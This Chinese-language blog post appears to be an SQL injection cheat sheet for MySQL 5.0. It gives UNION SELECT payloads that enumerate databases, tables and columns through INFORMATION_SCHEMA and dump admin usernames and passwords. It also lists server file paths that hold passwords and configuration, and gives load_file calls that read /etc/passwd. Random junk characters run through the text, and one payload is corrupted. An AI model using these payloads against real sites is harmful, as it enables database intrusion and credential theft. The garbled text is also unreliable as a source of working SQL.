mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


$ r8 r! W3 A1 H# p$ L
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
* E+ ^( w4 ~& @4 n|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称
  T6 C/ f1 [2 D1 b3 `( N. S. j
8 q" H0 G) R. n6 w# g! k3 y|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
' ?/ B+ _, E: ]( J
|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
& B& A% ^# @; T9 N5 J|—字段：TABLE_NAME ->存储所属表的名称
  |1 g) ~/ Y& o4 }" H
! }: _$ L* S) e6 T|—字段：COLUMN_NAME ->该字段的名称
% s5 w7 _/ L- e# B" ]. G7 C* N
$ T9 P/ ?$ Q# h#########################################################################
##
4 A0 N' F6 a: ~' H# Y9 t" B" `
0×001 获取系统信息:

union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
" s' a/ r/ Q* X2 F3 n( n
0 S% ~6 M" k, a/ s/*
  C2 a; v3 t+ G4 `, V
  g. S( _' x. m@@global.version_compile_os 获取系统版本

( B8 Y- S2 t2 [0 W' Q; y) z& D! T@@datadir 数据库路径
& X8 V0 [( N  ?database() 当前数据库名称
* y1 g/ p: x' a+ o1 D$ d% W3 W0x3c62723e 换行HEX值
& `, b$ p" o9 ?3 H; J5 u6 p  M
*/

######################################################################
& R1 p. q7 {9 Q
0×002 获取表名
: o: F; y, m1 w6 z; j. o
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
4 B, Y' @: @4 S; k. jinformation_schema.tables where table_schema=0x67617264656e /*
5 U$ S% \" `& y* k# M/ A% D
' f( Z/ s) G+ L3 j. {/ G7 l/*

5 }2 J( K4 ?) o6 r7 O% C0x67617264656e 为当前数据库名
8 Y" b- S) v/ `9 m" x! _8 D6 {+ e
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

' e3 d( d& V# q( q######################################################################

0×003 获取字段
0 _# M4 R# n, P7 J2 z0 [  r# r
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
# Z5 C, j# P% J4 i. G8 i- ginformation_schema.columns where table_name=0x61646d696e and
6 k# T$ k: A' y
( q3 A: K$ L/ a* a4 u0 |% L
table_schema=0x67617264656e limit 1 /*
" }  b, }% j3 `) W9 }
7 U  y2 C$ v" k: e2 Q1 m/*
! o6 ]/ ]! H, i% d, S% A2 ]
# p  o/ I5 O; ^  o2 p( Kgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
6 p  S+ ]( Q5 E9 O6 C, f
0x67617264656e ->数据库名
: z, v) B( R3 r. R( m
*/

#####################################################################
" g" {5 J4 R  c
3 [- q" b& _2 v- B7 H/ m- \4 M6 o0×004 获取数据
0 t" F0 m* z% O7 Z+ y  E$ X; `1 C3 y& _
union select 1,2,3
. E6 ^' S" q7 A% z, I  z,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

+ i' j* v' ?- a1 b, nunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
; Q! ?4 o/ T# s! J+ e: w(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号HEX编码

( K1 f% c2 q* E! k# m" |# C5 Sgroup_concat 同时获得该字段所有数据

% \/ D0 x0 W. o*/

+ [, ]) ^) O8 c( ^; u

9 `' A( Q1 `6 |4 {* s

顺便添加一些mysql注入时非常有用的一些东西

0 b* N4 l' C  H! l: @  d. L' ]7 {简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
$ p/ r1 n9 l/ L5 T4 u, f7 C- f7 L8@datadir     读取数据库路径
' z: F# C% s9 W- ~9 R  Y9@basedir    MYSQL 安装路径
; A6 k9 c4 m7 l5 D/ B( `10@version_compile_os   操作系统  Windows Server 2003,
/ M. j* _& k/ W- `. \$ K9 `收集的一些路径：
% |" G# K5 R: o3 o) w( d/ R8 LWINDOWS下:
c:/boot.ini          //查看系统版本
4 u: v( n9 d' |. C4 k0 C4 ]" Sc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
* y5 i, L2 V! Y1 A5 Uc:/winnt/php.ini
c:/winnt/my.ini
- I0 c; o+ o/ t& d9 j3 m5 x# Wc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
- e4 r3 W2 o. I3 J" xc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
" }9 V  K) M; U4 z, e9 n9 D//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
8 i) U! b4 B1 O* x- \' D

  j4 A0 [/ i2 K! ec:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
7 `' z+ i" N' L8 _c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

# q; X1 k/ ~7 y! h, {) nLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
' G( F! j" X( J1 q( y8 I$ o) u6 H/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
! I, ]% b+ `  ]4 F8 l/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
4 A" t8 K0 T; s, T! ~. ?/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
) z' G0 ?7 r  {, s! M2 l. v/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
- O7 _% T6 M' A/ y3 r* |/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
. W$ w' ~0 Z$ U* s/ V/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
3 G% X2 ?) Z" v: K7 V/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
9 R1 b' k7 w' }7 d  u/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
  @' o9 \( m7 E6 u; \load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
. L& |/ Z# ?: I# s0 ?